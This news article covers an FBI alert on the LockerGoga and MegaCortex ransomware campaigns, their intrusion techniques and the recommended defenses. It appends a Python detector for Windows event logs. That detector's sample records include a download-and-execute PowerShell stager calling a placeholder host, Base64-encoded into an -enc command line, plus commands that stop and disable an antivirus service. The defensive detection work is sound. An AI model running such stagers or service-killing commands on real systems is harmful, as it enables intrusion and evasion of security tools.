The FBI has issued a TLP:Amber alert in response to a spate of cyberattacks involving the ransomware variants LockerGoga and MegaCortex. The threat actors using these ransomware variants have been targeting large enterprises and organizations and typically deploy the ransomware several months after a network has been compromised.
LockerGoga was first detected in January 2019 and MegaCortex first appeared in May 2019. The two variants share similar indicators of compromise (IoCs) and similar command-and-control (C2) infrastructure, and both are used in highly targeted attacks on large corporate networks.
LockerGoga was used in the ransomware attacks on the U.S. chemical companies Hexion and Momentive, the aluminum and energy company Norsk Hydro, and the engineering consulting firm Altran Technologies. MegaCortex was used in the attacks on the accounting software firm Wolters Kluwer and the cloud hosting firm iNSYNQ, to name but a few. The threat actors are careful and methodical, and they attempt to cause maximum damage to increase the probability that their victims will pay. Ransom demands are often in the hundreds of thousands of dollars or more.
The initial compromise is achieved through a variety of methods, including exploitation of unpatched vulnerabilities, phishing, SQL injection, brute-force attacks on RDP, and the use of stolen credentials. Once inside, the attackers run batch files that stop the processes and services used by security solutions so that their presence goes undetected. They then move laterally to compromise as many devices as possible using the penetration testing tool Cobalt Strike, living-off-the-land Windows binaries, and publicly available tools such as the credential-dumping utility Mimikatz. A Cobalt Strike beacon is added to each compromised device on the network and is used to execute PowerShell scripts, escalate privileges, and spawn a new session that acts as a listener on the victim’s system, according to the FBI warning, as reported by Bleeping Computer, which obtained a copy of the alert.
In contrast to many other threat actors, who deploy ransomware soon after a system is compromised, the actors behind these attacks often wait several months before the encryption routine is triggered. It is unclear what they do during that time, but it is likely spent stealing sensitive data. The ransomware is deployed in the final stage of the attack, once all useful data has been obtained from the victim.
The advice offered by the FBI to improve defenses is standard for preventing ransomware and other cyberattacks. Cybersecurity best practices should be followed, including backing up data regularly; storing backup copies on non-networked devices; testing backups to ensure files can actually be restored; setting strong passwords; patching promptly; enabling multi-factor authentication, especially on administrator accounts; ensuring RDP servers can only be reached through a VPN; disabling SMBv1; and scanning for open ports and blocking any that are not needed so they cannot be reached from the outside.
The FBI also recommends auditing the creation of new accounts and monitoring Active Directory for changes to authorized users; enabling PowerShell logging and monitoring for unusual commands, including the execution of Base64-encoded PowerShell; and ensuring only the latest version of PowerShell is installed. The last point matters because the legacy Windows PowerShell 2.0 engine does not support script block logging, so an attacker who can launch it (for example with powershell -version 2) sidesteps that logging; removing the 2.0 engine closes that gap.
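The two behaviours the alert describes, batch files that stop security services and Base64-encoded PowerShell launched by beacons, both leave traces in Windows event logs once process-creation auditing with command lines (Event ID 4688) and PowerShell script block logging (Event ID 4104) are enabled. The following is an added example of the kind of detection logic a defender would run over those records; it is not code from the FBI alert or from Bleeping Computer. The event records, host and user names, the service name ExampleAVService, the 192.0.2.10 address (a documentation-range IP) and the indicator keyword list are all constructed for the example and should be tuned to your environment.

```python
"""Flag encoded PowerShell and service-stopping commands in Windows event
records.  Assumes 4688 (with command-line auditing) and 4104 (script block
logging) events have already been exported, e.g. from a SIEM, as dicts."""
import base64
import re

# Abbreviations PowerShell accepts for -EncodedCommand, as typically seen
# in attacker command lines; "-" or "/" prefix, case-insensitive.
ENCODED_SWITCH = re.compile(
    r"[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Tokens common in download-and-execute stagers (heuristic list chosen for
# this example, not an exhaustive signature).
SCRIPT_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "net.webclient",
    "invoke-webrequest", "frombase64string",
)

# Commands used by batch files to stop or disable services and processes.
SERVICE_STOP = re.compile(
    r"\b(?:net1?\s+stop|sc(?:\.exe)?\s+(?:stop|config|delete)|"
    r"taskkill(?:\.exe)?\s+/(?:f|im|pid)|stop-service|set-service)\b",
    re.IGNORECASE)


def decode_encoded_command(blob):
    """Decode an -EncodedCommand payload: Base64 wrapping UTF-16LE text.
    Returns None when the blob is not valid Base64 or not UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script):
    """Produce the Base64/UTF-16LE form PowerShell expects (builds the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def indicators_in(script):
    """Return the SCRIPT_INDICATORS present in script (case-insensitive)."""
    low = script.lower()
    return [tok for tok in SCRIPT_INDICATORS if tok in low]


def analyze_record(rec):
    """Return a list of findings for one event record (empty if benign)."""
    findings = []
    if rec.get("EventID") == 4688:
        cmd = rec.get("CommandLine", "")
        m = ENCODED_SWITCH.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group(1))
            findings.append({
                "rule": "encoded_powershell",
                "decoded": decoded,  # None means the blob did not decode
                "indicators": indicators_in(decoded) if decoded else [],
            })
        if SERVICE_STOP.search(cmd):
            findings.append({"rule": "service_stop", "command": cmd})
    elif rec.get("EventID") == 4104:
        hits = indicators_in(rec.get("ScriptBlockText", ""))
        if hits:
            findings.append({"rule": "script_block_indicators", "indicators": hits})
    for f in findings:
        f["host"] = rec.get("Computer")
        f["user"] = rec.get("SubjectUserName")
    return findings


def analyze(records):
    """Run analyze_record over every record and flatten the findings."""
    return [f for rec in records for f in analyze_record(rec)]


# Constructed sample records (hosts, users, service name and 192.0.2.10 are
# placeholders; 192.0.2.0/24 is reserved for documentation).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
SAMPLE_RECORDS = [
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(STAGER)},
    {"EventID": 4688, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c net stop "ExampleAVService" '
                    '& sc config ExampleAVService start= disabled'},
    {"EventID": 4104, "Computer": "WS02", "SubjectUserName": "admin",
     "ScriptBlockText": "$b=[Convert]::FromBase64String($x);"
                        "IEX([Text.Encoding]::Unicode.GetString($b))"},
    # Benign: -ExecutionPolicy is not an -EncodedCommand abbreviation.
    {"EventID": 4688, "Computer": "WS03", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(finding)
```

Decoding the payload rather than merely flagging the -enc switch is the useful part: it lets the analyst see the stager's download URL and apply the same keyword heuristics to the decoded text and to 4104 script blocks, and a blob that fails to decode is itself worth a look. The regex deliberately requires whitespace after the switch so that -ExecutionPolicy and similar parameters are not mistaken for an abbreviated -EncodedCommand.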